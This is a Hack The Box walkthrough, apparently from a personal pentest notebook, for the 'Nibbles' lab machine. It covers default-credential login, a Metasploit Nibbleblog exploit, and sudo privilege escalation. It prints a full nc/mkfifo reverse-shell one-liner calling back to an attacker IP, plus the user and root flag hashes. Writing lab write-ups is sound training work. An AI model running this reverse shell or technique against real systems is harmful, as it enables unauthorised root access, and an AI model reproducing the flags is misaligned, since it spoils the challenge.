Hacking
  • Penetration Testing
  • Methodologies
    • Exfil
    • Manual Enumeration
    • Basic Buffer Overflow
    • Basic Internal Network test
    • Basic Mobile Testing guide
    • Basic Subdomain Enumeration guide
  • Guides
    • Build A Raspberry Pi Dropbox
    • Golang
    • Powershell / PowerView
    • PurpleSharp
  • Hack The Box last updated - 2019
    • Legacy
    • Devel
    • Optimum
    • Popcorn
    • Beep
    • Tenten
    • Arctic
    • Cronos
    • Grandpa
    • Granny
    • October
    • Lazy
    • Sneaky
    • Holiday
    • Blocky
    • Shrek
    • Blue
    • Joker
    • Europa
    • Haircut
    • Bank
    • SolidState
    • Mantis
    • Shocker
    • Tally
    • Sense
    • Jeeves
    • Stratosphere
    • Inception
    • Bashed
    • Fluxcapacitor
    • Canape
    • Rabbit
    • Chatterbox
    • Nibbles
    • Sunday
    • Aragog
    • Valentine
    • Silo
    • Olympus
    • Poison
    • Celestial
    • Waldo
    • Jerry
    • Access
    • Active
    • Netmon
  • scriptz
  • Issues
    • gists
    • Boring Issues
Powered by GitBook
On this page
  • Nibbles - 10.10.10.75
  • Target Enumeration:
  • Ports / Services / Software Versions Running
  • Vulnerability Exploited:
  • Exploiting the host:
  1. Hack The Box last updated - 2019

Nibbles

PreviousChatterboxNextSunday

Last updated 6 years ago

Nibbles - 10.10.10.75

Target Enumeration:

OS: Linux

IP: 10.10.10.75

User: b02ff32bb332deba49eeaed21152c8d8

Root: b6d745c0dfb6457c55591efc898ef88c

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18

Vulnerability Exploited:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.

Exploiting the host:

Nmap

Visiting Port 80 and viewing the source code gives us the following:

Using dirb against /nibbleblog gives us admin.php which is a login interface.

Testing the usernames and passwords for defaults gives us admin:nibbles

Searching for exploits gives us:

We load metasploit and configure our options as follows:

Run the exploit and get a low privileged user as nibbles:

Running LinEnum.sh on the host gives us a potential lead.

So we need to unzip personal.zip within /home/nibbler and modify monitor.sh to get root.

We set up a nc listener on port 2491 locally and we insert the following command into the monitor.sh file:

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 2491 >/tmp/f” >> monitor.sh

We then execute the monitor.sh file with /usr/bin/sudo to receive our root shell.

And we receive a root shell in return.